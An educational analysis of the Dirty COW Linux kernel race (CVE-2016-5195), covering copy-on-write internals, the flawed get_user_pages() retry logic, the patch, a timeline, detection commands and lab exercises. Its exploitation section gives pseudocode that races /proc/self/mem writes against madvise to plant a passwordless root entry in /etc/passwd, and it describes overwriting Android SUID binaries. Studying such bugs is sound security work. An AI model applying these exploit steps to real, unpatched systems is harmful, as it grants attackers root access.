03 — Dirty COW Analysis (CVE-2016-5195)

Technical Overview

Dirty COW (CVE-2016-5195) is a race condition in the Linux kernel's memory management subsystem that allowed an unprivileged local user to write to any file they could read, including /etc/passwd and SUID binaries, without write permission. The vulnerability was present in the kernel for approximately 9 years (from Linux 2.6.22, released July 2007) before it was discovered and disclosed in October 2016.

The name derives from the mechanism: dirty copy-on-write (COW). By racing the copy-on-write protection away before a write completed, an attacker could make the write land on the original file's page instead of on a private copy.

CVSS v3 score: 7.8 HIGH (local attack vector, low privileges required, no user interaction, high impact on confidentiality, integrity, and availability).

Prerequisites

Linux virtual memory: mmap, anonymous vs file-backed mappings
Copy-on-write semantics in Linux VM
/proc/self/mem (kernel mechanism for self-debugging)
madvise() system call (memory advice hints)
Basics of memory-mapped file I/O

Background: Copy-on-Write in Linux

Copy-on-write (CoW) is a memory optimization used by fork(). When a process forks, the child receives a copy of the parent's page tables but no pages are physically copied: parent and child share the same physical pages, which are marked read-only in both page tables.

When either process writes to a shared page, the MMU detects a write to a read-only page and raises a page fault (specifically a write protection fault or COW fault). The kernel's page fault handler:

Detects this is a COW fault (page is shared, write to CoW page)
Allocates a new physical page
Copies the original page's content to the new page
Updates the faulting process's page table entry to point to the new (private) copy with write permission
Returns, allowing the write to proceed to the private copy

The original physical page is unmodified. Both the parent and child now have private copies.

Before write fault:
  Parent PTE: phys_page_A → read-only
  Child  PTE: phys_page_A → read-only (same physical page)
  Physical:   phys_page_A (original content)

After CoW fault (child writes):
  Parent PTE: phys_page_A → read-only (unchanged)
  Child  PTE: phys_page_B → read-write (new private copy)
  Physical A: original content (unchanged)
  Physical B: copy of A, with child's write applied
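
The before/after picture above can be observed from userspace. The following is a minimal sketch, assuming a Linux or other POSIX system; the function name parent_byte_after_child_write() is hypothetical and exists only for this illustration. The child overwrites a byte in a private page after fork(), and the parent then reads its own view of the same address.

```c
#ifndef _DEFAULT_SOURCE
#define _DEFAULT_SOURCE   /* exposes MAP_ANONYMOUS on strict compilers */
#endif
#include <assert.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Hypothetical helper: returns the byte the parent sees after the child
 * has written to its own copy of the page, or -1 on setup failure. */
int parent_byte_after_child_write(void)
{
    unsigned char *page = mmap(NULL, 4096, PROT_READ | PROT_WRITE,
                               MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (page == MAP_FAILED)
        return -1;
    page[0] = 'A';                      /* touch it so a physical page exists */

    pid_t pid = fork();
    if (pid < 0) {
        munmap(page, 4096);
        return -1;
    }
    if (pid == 0) {
        page[0] = 'B';                  /* write fault: child gets its own copy */
        _exit(page[0] == 'B' ? 0 : 1);
    }

    int status = 0;
    int value = -1;
    if (waitpid(pid, &status, 0) == pid && WIFEXITED(status) &&
        WEXITSTATUS(status) == 0)
        value = page[0];                /* parent still reads the original page */
    munmap(page, 4096);
    return value;
}
```

A caller can check the result with assert(parent_byte_after_child_write() == 'A'): the child's write went to its private copy and the parent's page is unchanged.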

For private file mappings: when a process maps a file with MAP_PRIVATE, the same CoW mechanism applies. A write to the mapping, whether an ordinary store through a PROT_WRITE mapping or a forced write to a PROT_READ mapping via /proc/self/mem, should go to a private copy in the process's address space and never reach the underlying file.
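
As a small illustration of that guarantee, the sketch below writes through a writable MAP_PRIVATE mapping and then reads the file itself. It assumes a writable /tmp directory; the scratch file name and the function file_byte_after_private_write() are hypothetical.

```c
#ifndef _DEFAULT_SOURCE
#define _DEFAULT_SOURCE   /* exposes mkstemp() and pread() on strict compilers */
#endif
#include <assert.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <unistd.h>

/* Hypothetical helper: stores 'X' through a MAP_PRIVATE mapping, then
 * returns the first byte read back from the file; -1 on setup failure. */
int file_byte_after_private_write(void)
{
    char path[] = "/tmp/cow_demo_XXXXXX";      /* scratch file for the demo */
    int fd = mkstemp(path);
    if (fd < 0)
        return -1;
    unlink(path);                               /* removed once fd is closed */
    if (write(fd, "original", 8) != 8) {
        close(fd);
        return -1;
    }

    char *map = mmap(NULL, 8, PROT_READ | PROT_WRITE, MAP_PRIVATE, fd, 0);
    if (map == MAP_FAILED) {
        close(fd);
        return -1;
    }

    map[0] = 'X';                               /* CoW fault: private copy only */

    char from_file = 0;
    int ok = (pread(fd, &from_file, 1, 0) == 1) && (map[0] == 'X');
    munmap(map, 8);
    close(fd);
    return ok ? from_file : -1;
}
```

On a correctly behaving kernel the function returns 'o': the mapping shows "Xriginal" while the file still begins with "original".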

The Vulnerable Code Path

The vulnerability lives in the kernel's get_user_pages() code (mm/gup.c since Linux 3.15, mm/memory.c before that), specifically in the interaction between three operations:

write() to /proc/self/mem (which can write to any address in the current process)
madvise(MADV_DONTNEED) on a mapped region (discards the private copy, forcing next access to re-fault)
The kernel's get_user_pages() function which pins pages for direct access

The normal flow for writing to a read-only mapping via /proc/self/mem:

write(proc_mem_fd, data, size, offset=mapped_ro_file_addr)
    │
    ▼
mem_write() in fs/proc/base.c
    │
    ▼
access_remote_vm() → get_user_pages()
    │
    ├── Walks page table for the address
    ├── Finds page is read-only (CoW protection)
    ├── Triggers software CoW: allocates new private copy
    └── Returns pointer to the NEW private copy
    │
    ▼
copy_to_user_page() — writes data to the private copy
    │
    ▼
RESULT: data written to private copy, ORIGINAL FILE UNCHANGED

This is the intended behavior: writing via /proc/self/mem to a read-only mmap'd address creates and writes to a private copy, never touching the original file.
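
The intended behavior can be checked without any race. The sketch below is an illustration under assumptions, not a test for the vulnerability: it assumes /tmp is writable and that the kernel permits writes to /proc/self/mem (some sandboxes and hardened configurations do not). The function name proc_mem_write_is_private() is hypothetical.

```c
#ifndef _DEFAULT_SOURCE
#define _DEFAULT_SOURCE   /* exposes mkstemp(), pread(), pwrite() */
#endif
#include <assert.h>
#include <fcntl.h>
#include <stdint.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <unistd.h>

/* Hypothetical helper. Returns 1 if a /proc/self/mem write to a read-only
 * private mapping changed the mapping but not the file, 0 if the file
 * changed, and -1 if the environment did not allow the experiment. */
int proc_mem_write_is_private(void)
{
    char path[] = "/tmp/procmem_demo_XXXXXX";   /* scratch file for the demo */
    int fd = mkstemp(path);
    if (fd < 0)
        return -1;
    unlink(path);
    if (write(fd, "original", 8) != 8) {
        close(fd);
        return -1;
    }

    /* Read-only private mapping: a plain store through map would SIGSEGV. */
    char *map = mmap(NULL, 8, PROT_READ, MAP_PRIVATE, fd, 0);
    int mem = open("/proc/self/mem", O_RDWR);
    int result = -1;

    if (map != MAP_FAILED && mem >= 0 &&
        pwrite(mem, "X", 1, (off_t)(uintptr_t)map) == 1) {
        char from_file = 0;
        if (pread(fd, &from_file, 1, 0) == 1)
            result = (((volatile char *)map)[0] == 'X' && from_file == 'o');
    }

    if (mem >= 0)
        close(mem);
    if (map != MAP_FAILED)
        munmap(map, 8);
    close(fd);
    return result;
}
```

A return value of 1 matches the flow above: the kernel performed CoW on behalf of the writer, so the process sees the new byte while the file keeps its original content.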

The Race Condition: How Dirty COW Works

The bug: the lookup-and-fault retry loop inside get_user_pages() dropped its write requirement after breaking CoW once. An attacker can race madvise(MADV_DONTNEED) against that loop to discard the private copy between the CoW fault and the retried lookup, so that the retry returns the original page-cache page and copy_to_user_page() writes to it.

Race window timing diagram:

Thread 1 (Writer): write() to /proc/self/mem
Thread 2 (Madvise): madvise(MADV_DONTNEED) in a tight loop

   Thread 1                          Thread 2
       │                                 │
  write(proc_fd, data, ...)             │
       │                          madvise(addr, MADV_DONTNEED)
       ▼                                 │
  get_user_pages()                       │
  ├── Walk page table                    │
  ├── Find CoW page                      │
  ├── Allocate PRIVATE copy ←━━━━━━━━━━━━┥ RACE WINDOW OPENS
  │   (FOLL_WRITE is cleared)            │
  │                                      ▼
  │                            madvise(MADV_DONTNEED)
  │                            DISCARDS PRIVATE COPY
  │                            Next fault maps the original file page
  │                            RACE WINDOW CLOSES
  ├── Retry lookup as a READ: faults in and
  │   returns the original page-cache page
  ▼
  copy_to_user_page() writes to the page get_user_pages() returned
  BUT the private copy was discarded!
  The returned page is the original file page!
  → WRITE GOES TO ORIGINAL FILE

  Result: read-only file has been modified

Key insight: MADV_DONTNEED discards the private CoW copy, so the next fault on that address maps the underlying file page again. If this happens inside get_user_pages(), after the CoW fault has cleared the write requirement but before the lookup is retried, the retry is treated as a read and returns the file's page-cache page. copy_to_user_page() then writes to whatever page get_user_pages() returned, which is now the original file's page.
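
The effect of MADV_DONTNEED on a private copy is documented behavior and can be seen in isolation. The sketch below assumes a writable /tmp; the function name byte_after_dontneed() is hypothetical. It dirties a private copy, discards it, and reads the same address again.

```c
#ifndef _DEFAULT_SOURCE
#define _DEFAULT_SOURCE   /* exposes mkstemp() and madvise() */
#endif
#include <assert.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <unistd.h>

/* Hypothetical helper: returns the first byte of a private file mapping
 * after its modified private copy was discarded; -1 on setup failure. */
int byte_after_dontneed(void)
{
    long page = sysconf(_SC_PAGESIZE);
    char path[] = "/tmp/dontneed_demo_XXXXXX";  /* scratch file for the demo */
    int fd = mkstemp(path);
    if (fd < 0 || page <= 0)
        return -1;
    unlink(path);
    if (write(fd, "original", 8) != 8) {
        close(fd);
        return -1;
    }

    volatile char *map = mmap(NULL, (size_t)page, PROT_READ | PROT_WRITE,
                              MAP_PRIVATE, fd, 0);
    if (map == MAP_FAILED) {
        close(fd);
        return -1;
    }

    map[0] = 'X';                       /* private copy now starts with 'X' */
    int before = map[0];

    int rc = madvise((void *)map, (size_t)page, MADV_DONTNEED);
    int after = map[0];                 /* re-faults from the page cache */

    munmap((void *)map, (size_t)page);
    close(fd);
    return (rc == 0 && before == 'X') ? after : -1;
}
```

The function returns 'o' on Linux: once the private copy is dropped, the address is backed by the file's page again, which is the state the race needs the kernel to observe at the wrong moment.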

The race window is narrow (a short stretch of kernel code between the CoW fault and the retried lookup) but not impossibly so, because both threads repeat their syscalls in tight loops. On a multi-core system, or on sibling Hyper-Threading logical CPUs sharing one physical core, Thread 1 and Thread 2 run genuinely concurrently.

Technical Deep Dive: get_user_pages() Flaw

The core issue was in faultin_page() (called by get_user_pages()):

/* VULNERABLE CODE (simplified, pre-patch) */
static int faultin_page(struct task_struct *tsk, struct vm_area_struct *vma,
                        unsigned long address, unsigned int *flags, int *nonblocking)
{
    struct mm_struct *mm = vma->vm_mm;
    unsigned int fault_flags = 0;
    int ret;

    if (*flags & FOLL_WRITE)
        fault_flags |= FAULT_FLAG_WRITE;

    /* Trigger CoW fault: allocates private copy */
    ret = handle_mm_fault(mm, vma, address, fault_flags);

    /* VM_FAULT_WRITE: CoW happened, private copy allocated. In a
       read-only VMA the new PTE still cannot be made writable, so a
       FOLL_WRITE lookup would never succeed. */
    if ((ret & VM_FAULT_WRITE) && !(vma->vm_flags & VM_WRITE)) {
        /* PROBLEM: between here and the retried lookup, MADV_DONTNEED
           can discard the private copy */
        *flags &= ~FOLL_WRITE;  /* WRONG: clears write requirement,
                                    allowing retry without CoW */
    }
    return 0;
}

The bug is *flags &= ~FOLL_WRITE after a successful CoW. FOLL_WRITE controls whether the retried lookup in get_user_pages() requires write access. Once it is cleared, if MADV_DONTNEED discards the private copy before the retry, the retry is handled as a read: it faults the original page-cache page back in WITHOUT performing CoW again, and the write then proceeds directly to the original file page.
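
The retry logic can be modeled deterministically in userspace. The following is a toy state machine, not kernel code: the types, the flag value, and the function names (follow_page_model, faultin_page_model, gup_vulnerable) are all hypothetical, and the "race" is simulated by zapping the PTE at the worst possible moment.

```c
#include <assert.h>

#define FOLL_WRITE 0x1u               /* illustrative value */

enum page_kind { PAGE_NONE, PAGE_FILE, PAGE_COW };

struct pte_model {
    enum page_kind page;              /* what the PTE currently maps */
    int writable;                     /* always 0 here: the VMA is read-only */
};

/* Lookup: fails if nothing is mapped, or if a write is requested and the
 * PTE is not writable. */
static enum page_kind follow_page_model(const struct pte_model *pte,
                                        unsigned int flags)
{
    if (pte->page == PAGE_NONE)
        return PAGE_NONE;
    if ((flags & FOLL_WRITE) && !pte->writable)
        return PAGE_NONE;
    return pte->page;
}

/* Pre-patch fault handling: a write fault breaks CoW and then drops
 * FOLL_WRITE; a read fault maps the file's page-cache page. */
static void faultin_page_model(struct pte_model *pte, unsigned int *flags)
{
    if (*flags & FOLL_WRITE) {
        pte->page = PAGE_COW;
        *flags &= ~FOLL_WRITE;        /* the flawed shortcut */
    } else if (pte->page == PAGE_NONE) {
        pte->page = PAGE_FILE;
    }
}

/* Returns the page a forced write would land on. If zap_after_cow is set,
 * a simulated madvise(MADV_DONTNEED) runs right after the CoW fault. */
enum page_kind gup_vulnerable(int zap_after_cow)
{
    struct pte_model pte = { PAGE_FILE, 0 };
    unsigned int flags = FOLL_WRITE;

    for (;;) {
        enum page_kind page = follow_page_model(&pte, flags);
        if (page != PAGE_NONE)
            return page;
        faultin_page_model(&pte, &flags);
        if (zap_after_cow) {
            pte.page = PAGE_NONE;     /* private copy discarded */
            zap_after_cow = 0;
        }
    }
}
```

Without interference, gup_vulnerable(0) yields PAGE_COW. With the simulated zap, gup_vulnerable(1) yields PAGE_FILE, because the second pass through the loop no longer carries FOLL_WRITE and is served by a read fault.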

Exploitation: Modifying /etc/passwd

The most common exploitation method:

/* Classic Dirty COW exploit pseudocode */

int f = open("/etc/passwd", O_RDONLY);
struct stat st;
fstat(f, &st);

/* Map /etc/passwd read-only */
char *map = mmap(NULL, st.st_size, PROT_READ, MAP_PRIVATE, f, 0);

/* Thread 1: write "root" entry with no password */
void *write_thread(void *arg) {
    int proc_fd = open("/proc/self/mem", O_RDWR);
    while (!stop) {
        /* Write backdoor root entry over first line */
        lseek(proc_fd, (off_t)map, SEEK_SET);
        write(proc_fd, backdoor_entry, strlen(backdoor_entry));
    }
}

/* Thread 2: MADV_DONTNEED in a loop */
void *madvise_thread(void *arg) {
    while (!stop) {
        madvise(map, st.st_size, MADV_DONTNEED);
    }
}

/* Start both threads, run for ~200ms */
/* Check: did /etc/passwd get modified? */
/* If not, try again */

After successful exploitation, /etc/passwd contains a new root entry (or modified root entry with no password hash). The attacker then runs su with no password to gain root.

Android exploitation: The same technique was used to overwrite a SUID binary (e.g., /system/bin/run-as or /system/xbin/su) with a backdoored version. On Android, this was particularly effective because:
- Android apps run as isolated UIDs but can access /proc/self/mem
- /system is typically mounted read-only, but its file permissions make it readable by apps
- Successful overwrite of run-as gave a root shell

Exploitation Timeline

  2007-07-08: Linux 2.6.22 released — bug introduced
  |           (approximately — exact introduction commit is
  |           controversial; the bug's root is older)
  |
  |           9 YEARS of silent presence in every Linux system
  |           deployed globally
  |
  2016-10-13: Linus Torvalds authors the fix
              ("This is an ancient bug..."); it is merged into
              mainline on 2016-10-18
  |
  2016-10-19: Phil Oester publicly discloses CVE-2016-5195
              Discovery: found in the wild via analysis of
              HTTP server exploit file uploads; Oester reported
              recovering the exploit from captured HTTP traffic
  |
  2016-10-20: Linux 4.8.3, 4.7.9, 4.4.26 released with fix
  |
  2016-11:    Android security bulletin includes patches for
              all supported Android versions
  |
  2016-2017:  Dirty COW used in:
              - Android device rooting tools (mass deployment)
              - Targeted attacks against Linux web servers
              - Container escapes (early, before seccomp blocking)

Phil Oester, the discoverer, found it not by code review but by recovering an exploit binary from HTTP traffic captured on a server he was monitoring; the binary used Dirty COW to gain root. The bug had been in production for 9 years before real-world exploitation was observed.

Linus Torvalds' commit message: "This is an ancient bug that was actually attempted to be fixed once (badly) by me eleven years ago in commit 4ceb5db9757a ('Fix get_user_pages() race for write access') but that was then undone due to problems on s390 by commit f33ea7f404e5 ('fix get_user_pages bug')."

The original fix attempt dates from 2005, so the underlying issue had been known for 11 years before a correct fix was applied.

The Patch

The fix keeps the write requirement across retries and instead records, in a new flag, that CoW has already been performed:

/* PATCHED approach (simplified) */
static int faultin_page(...)
{
    struct mm_struct *mm = vma->vm_mm;
    unsigned int fault_flags = 0;
    int ret;

    if (*flags & FOLL_WRITE)
        fault_flags |= FAULT_FLAG_WRITE;

    ret = handle_mm_fault(mm, vma, address, fault_flags);

    /* KEY CHANGE: do NOT clear FOLL_WRITE after CoW */
    /* The retry loop will re-check page writability each time */
    /* If MADV_DONTNEED discards the copy, retry will redo CoW */

    if ((ret & VM_FAULT_WRITE) && !(vma->vm_flags & VM_WRITE))
        *flags |= FOLL_COW;  /* mark that we already did CoW */

    return 0;
}

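The critical change: stop clearing FOLL_WRITE after CoW. On the lookup side, a non-writable PTE is accepted for a write only when FOLL_FORCE and FOLL_COW are set and the PTE is dirty, which is true of a freshly made private copy but not of a clean page-cache page. If the private copy is discarded between iterations of get_user_pages()'s retry loop, the next iteration still requires write access, triggers a new CoW, and gets a fresh private copy. Winning the race no longer helps, because a retry can never return the original file page for writing.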
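
The patch pairs the FOLL_COW flag with a lookup-side predicate, can_follow_write_pte(). The sketch below models that predicate in userspace. The struct pte_model type is hypothetical and the flag values are illustrative; only the boolean logic is meant to mirror the fix.

```c
#include <assert.h>
#include <stdbool.h>

/* Illustrative flag values for the model. */
#define FOLL_WRITE 0x0001u
#define FOLL_FORCE 0x0010u
#define FOLL_COW   0x4000u

/* Hypothetical stand-in for the two PTE bits the check looks at. */
struct pte_model {
    bool writable;
    bool dirty;
};

/* A write lookup may use this PTE if it is writable, or if this is a
 * forced write that has already broken CoW and the PTE is dirty (a fresh
 * private copy is installed dirty; a clean page-cache page is not). */
bool can_follow_write_pte(struct pte_model pte, unsigned int flags)
{
    return pte.writable ||
           ((flags & FOLL_FORCE) && (flags & FOLL_COW) && pte.dirty);
}
```

With flags FOLL_WRITE | FOLL_FORCE | FOLL_COW, a dirty non-writable PTE (the private copy) passes, while a clean non-writable PTE (the file page that reappears after MADV_DONTNEED) is rejected and forces another CoW fault.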

Impact Assessment

Affected systems: Every Linux system running kernel 2.6.22 through 4.8.2. This includes:
- All major Linux distributions (Ubuntu, Debian, RHEL, CentOS, Fedora, openSUSE)
- Android 1.0 through 7.1 (approximately)
- Embedded Linux systems, routers, IoT devices (many never patched)
- Container hosts where containers run with host kernel

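Exploitability: Very high. Public proof-of-concept exploits run the two racing loops for a short burst (on the order of hundreds of milliseconds) and retry until the target changes, so the success rate is very high on multi-core systems, including those where the two threads share a core through Hyper-Threading. Even on non-HT systems, the race is winnable with patient iteration.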

Actual exploitation in the wild: Documented in:
- Android rooting tools ("DirtyCOW root exploit for Android 5/6/7"), distributed via app stores and rooting forums
- Linux privilege escalation in CTF competitions (reliable, fast)
- Targeted attacks against cloud Linux instances (documented by Red Hat security team)

Lessons: Why Race Condition Bugs Are Long-Lived

Dirty COW illustrates why race conditions are among the hardest bugs to detect and fix:

Static analysis struggles to detect it: The flaw requires reasoning about two concurrent code paths, their relative timing, and the state change from MADV_DONTNEED. No compiler warning and no -fsanitize flag catches it.
Normal execution appears correct: Running the vulnerable code path once, with no concurrent madvise, works perfectly. Unit tests pass. System tests pass. Only under specific race conditions does the bug manifest.
Distance between components: The bug involves the page fault and get_user_pages() code (mm/memory.c, mm/gup.c), mm/madvise.c (MADV_DONTNEED), and fs/proc/base.c (/proc/self/mem write). The interaction between three separate subsystems is not apparent in code review of any single file.
Previous fix was incomplete: Linus's 2005 fix attempted to solve the same problem but was reverted due to s390 compatibility issues. The correct fix required understanding why the original fix broke s390.
Kernel race detection tooling arrived late: ThreadSanitizer targets userspace, and its kernel counterpart KCSAN (Kernel Concurrency Sanitizer) was only merged in Linux 5.8 (2020), four years after Dirty COW was found. Even then, KCSAN reports data races (unsynchronized concurrent accesses), so a logic race like this one, whose individual steps are properly locked, is not guaranteed to be flagged.

Variant Analysis: Dirty Pipe (CVE-2022-0847)

For comparison, Dirty Pipe is a 2022 vulnerability by Max Kellermann with similar impact (write to read-only files) but different mechanism:

Class: Logic error (uninitialized flag) in pipe splice code, not a race condition
Mechanism: PIPE_BUF_FLAG_CAN_MERGE flag was not cleared when a pipe page was initialized from a file splice. Subsequent writes to the pipe could "merge" into the spliced page, writing to the original file.
No race required: Dirty Pipe is deterministic, fully reliable, single-threaded
Impact: Same as Dirty COW — write to any file readable by the process
Kernel versions: 5.8 (when splice merge was added) through 5.16.10

Both bugs allow writing to arbitrary read-only files but Dirty Pipe is simpler to exploit reliably.
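
The stale-flag mechanism behind Dirty Pipe can be shown with a toy model of a single reused pipe slot. This is a sketch for comparison only: the struct, the function names, and the flag value are hypothetical simplifications of the kernel's pipe buffer handling.

```c
#include <assert.h>

#define PIPE_BUF_FLAG_CAN_MERGE 0x10u   /* illustrative value */

enum page_kind { ANON_PAGE, FILE_CACHE_PAGE };

/* Hypothetical stand-in for one slot in the pipe's ring of buffers. */
struct pipe_buf_model {
    enum page_kind page;
    unsigned int flags;
};

/* An ordinary write() into an empty slot: a fresh anonymous page that
 * later small writes are allowed to append to. */
static void slot_from_write(struct pipe_buf_model *slot)
{
    slot->page = ANON_PAGE;
    slot->flags = PIPE_BUF_FLAG_CAN_MERGE;
}

/* splice() from a file reuses the slot and points it at the page cache.
 * init_flags == 0 models the bug: the old flags are left in place. */
static void slot_from_splice(struct pipe_buf_model *slot, int init_flags)
{
    slot->page = FILE_CACHE_PAGE;
    if (init_flags)
        slot->flags = 0;
}

/* Returns the kind of page the next small write() would modify. */
enum page_kind next_write_target(int init_flags)
{
    struct pipe_buf_model slot;

    slot_from_write(&slot);               /* fill the pipe once ... */
    /* ... then drain it: the slot is free but keeps its stale flags */
    slot_from_splice(&slot, init_flags);  /* splice file data into it */

    /* A mergeable slot receives the data; otherwise a new page is used. */
    return (slot.flags & PIPE_BUF_FLAG_CAN_MERGE) ? slot.page : ANON_PAGE;
}
```

next_write_target(0) returns FILE_CACHE_PAGE (the bug), while next_write_target(1) returns ANON_PAGE (flags initialized, as in the fix). Unlike the Dirty COW model, nothing here depends on timing.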

Debugging Notes

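# Check if kernel is vulnerable
uname -r
# Upstream fixes: 4.8.3, 4.7.9, 4.4.26 (and 4.9 onward).
# Distribution kernels backport the fix without changing the base
# version, so also check the vendor advisory for the installed package.

# Check KCSAN (Kernel Concurrency Sanitizer) status
grep CONFIG_KCSAN /boot/config-$(uname -r)

# Monitor for Dirty COW exploitation attempts
# Pattern: rapid madvise + proc/mem writes from same process
# Caveat: the exploit modifies the page cache without going through the
# normal file write path, so the watches below may never fire.
inotifywait -m /etc/passwd &
# Then watch for writes

# Audit approach
auditctl -w /etc/passwd -p w -k passwd_write

# Post-exploitation detection: /etc/passwd modification time
# (may be unchanged after a Dirty COW write; also compare the contents
# against a known-good copy or checksum)
stat /etc/passwd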
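
The version check above can be automated for the upstream release lines this section names. The sketch below is deliberately conservative: dirtycow_fix_status() is a hypothetical helper, it only knows the 4.4, 4.7, and 4.8 stable branches and mainline 4.9 onward, and it cannot see distribution backports, so a result of 1 means "check the vendor advisory", not "confirmed vulnerable".

```c
#include <assert.h>
#include <stddef.h>
#include <stdio.h>

/* Hypothetical helper. Takes a release string such as "4.4.21-generic".
 * Returns 1 if the upstream version predates the fix, 0 if it contains
 * the fix, and -1 if the string is unparsable or the branch is not one
 * of those listed in this section. */
int dirtycow_fix_status(const char *release)
{
    int major = 0, minor = 0, patch = 0;

    if (release == NULL ||
        sscanf(release, "%d.%d.%d", &major, &minor, &patch) < 2)
        return -1;

    /* The fix was merged before 4.9 was released. */
    if (major > 4 || (major == 4 && minor >= 9))
        return 0;
    if (major == 4 && minor == 8)
        return patch < 3;
    if (major == 4 && minor == 7)
        return patch < 9;
    if (major == 4 && minor == 4)
        return patch < 26;

    return -1;   /* other branches: consult the vendor's advisory */
}
```

To apply it to the running kernel, pass the release field filled in by uname() from <sys/utsname.h>, which is the same string that uname -r prints.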

Security Implications

Dirty COW demonstrates the risk of:
- Complex multi-threaded kernel code paths: The interaction of multiple syscalls in concurrent scenarios creates emergent vulnerabilities
- Read-only memory is not immutable: If a kernel bug allows bypassing the write protection, "read-only" files can be silently modified
- Privileged processes (SUID binaries): Modifying a SUID binary is equivalent to gaining root; any readable SUID binary is a target
- Containers: Despite container isolation, all containers share the host kernel, so a Dirty COW exploit inside a container escapes it because it modifies host filesystem pages

Performance Implications

The fix adds one extra flag and check to the existing retry loop in get_user_pages(), and this path is not on the hot path for normal memory access. The performance impact of the patch is negligible.

KCSAN (merged later to help detect concurrency bugs) adds substantial runtime overhead and is only enabled in debug and test kernels, not production.

Failure Modes

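Exploit race not won: The two threads iterate for the window duration without winning. On heavily loaded systems, the scheduler may not interleave them appropriately. Solution: run the race for longer, or pin the two threads to different CPUs with sched_setaffinity(). Raising priority with a negative nice value or real-time scheduling is usually not an option, because both require privileges an unprivileged attacker does not have.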

Kernel oops: If the race is won in a way that corrupts kernel data structures rather than cleanly writing to the file page, the kernel may oops. Rare but observed in buggy exploit implementations.

Partial write: Only part of the modification was written before the race window closed. /etc/passwd may be partially corrupted. Solution: check file integrity before proceeding.

Modern Usage

Dirty COW is patched on any modern Linux kernel. Its continued relevance is:

Unpatched IoT/embedded devices: Millions of embedded Linux systems running 2.6.x-4.x kernels will never be updated. Dirty COW is reliably exploitable on any such device that can be accessed.
Educational value: Dirty COW is the canonical race condition kernel exploit used in security education, CTF challenges, and exploit development training because it is approachable, well-documented, and historically important.
Variant hunting: Understanding Dirty COW's mechanism motivates looking for similar races in other VM interactions. CVE-2019-14489, CVE-2020-29374 (GUP variants) are directly inspired by Dirty COW analysis.

Future Directions

KCSAN deployment in CI/CD: Google's kernel fuzzing infrastructure (syzkaller + KCSAN) now runs continuously against the Linux kernel mainline, catching new data races before they reach stable kernels. KCSAN relies on compiler instrumentation of memory accesses combined with sampled watchpoints: if two CPUs access the same memory location concurrently without proper synchronization, and at least one access is a write, KCSAN can report it.

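Memory safety for CoW paths: A Rust rewrite of the CoW page fault handler could encode the lifetime of the CoW page in the type system, so that the page must still be valid when the write proceeds. Dirty COW itself was a logic error in flag handling rather than a memory-safety violation, so safe Rust alone would not necessarily have prevented it; the benefit would come from making the page's ownership explicit in the API.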

Exercises

Set up an isolated Linux VM running an unpatched 4.4.x kernel (the original Ubuntu 16.04 release kernel is a good choice). Run the Dirty COW exploit against /etc/passwd inside the VM. Verify exploitation. Patch the kernel and confirm the exploit fails.
Read Linus's 2005 commit (4ceb5db9757a) and the commit that undid it (f33ea7f404e5). Understand why the 2005 fix broke s390. Write a one-page explanation.
Implement a minimal Dirty COW PoC that writes a single byte to a read-only file. Measure the average time-to-win the race across 100 runs on your test system.
Compare CVE-2016-5195 (Dirty COW) and CVE-2022-0847 (Dirty Pipe): both write to read-only files. Write a comparison table of mechanism, reliability, kernel version range, and mitigation.
Use KCSAN on a test kernel: enable CONFIG_KCSAN=y, write a kernel module that deliberately has a data race, and capture the KCSAN report. Understand what a KCSAN report looks like.

References

CVE-2016-5195: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5195
Phil Oester's disclosure: https://dirtycow.ninja/
Linus Torvalds' fix commit: 19be0eaffa3a ("mm: remove gup_flags FOLL_WRITE games from __get_user_pages()")
CVE-2022-0847 (Dirty Pipe) analysis: https://dirtypipe.cm4all.com/
KCSAN paper: "KCSAN: Finding races in the Linux kernel" — Marco Elver, Google, 2020
Android DirtyCow analysis: Project Zero blog
mm/memory.c — Linux kernel CoW implementation
Linux kernel git: git log --all --oneline | grep -i "cow\|get_user_pages\|foll_write"